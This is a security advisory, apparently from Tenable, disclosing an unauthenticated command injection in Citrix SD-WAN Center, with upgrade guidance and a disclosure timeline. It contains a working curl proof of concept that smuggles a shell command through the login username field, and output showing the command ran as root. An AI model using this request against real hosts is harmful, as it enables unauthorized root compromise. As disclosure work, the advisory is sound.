### SynopsisWhile developing a Nessus plugin for CVE-2017-6316, Tenable found an unauthenticated remote operating system command injection vulnerability in Citrix SD-WAN Center 10.2.0.136.733315.The vulnerability appears to be in /home/talariuser/www/app/Controller/UsersController.php. The controller has insufficient validation of user-supplied data ($username). An unauthenticated remote attacker can use the following CURL command to run arbitrary OS commands on the remote host:“`curl -skv –tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'“`With command output:“`root@VWC:/home/talariuser/www/app/Controller# cat /tmp/testuid=0(root) gid=0(root) groups=0(root)“`### SolutionUpgrade NetScaler SD-WAN Center to 10.0.7 or newer. Upgrade Citrix SD-WAN Center to 10.2.1 or newer. Follow Citrix's security best practices to further enhance your security posture.### Additional Referenceshttps://support.citrix.com/article/CTX247737 ### Disclosure Timeline* 01/28/19 – Vulnerability discovered.* 02/07/19 – Tenable reported to firstname.lastname@example.org via encrypted email. 90 days is May 9th.* 02/08/19 – Citrix acknowledges and asks for Tenable's public key.* 02/08/19 – Tenable sends a public key.* 02/26/19 – Citrix acknowledges they've reproduced the vulnerability.* 02/26/19 – Tenable thanks Citrix.* 04/03/19 – Tenable asks Citrix for an update.* 04/04/19 – Citrix indicates they are getting a CVE assigned and a bulletin ready. Asks Tenable who to credit.* 04/04/19 – Tenable says "Tenable, Inc." and offers to assign the CVE.* 04/08/19 – Citrix indicates April 10th is the disclosure date and notes they already have a CVE allocated.* 04/08/19 – Tenable asks for a copy of the draft bulletin or CVE assignment.* 04/08/19 – Citrix assigned CVE-2019-10883. Can't share bulletin.* 04/08/19 – Tenable thanks Citrix.* 04/10/19 – Citrix notifies Tenable of publication and thanks Tenable.* 04/10/19 – Tenable thanks Citrix.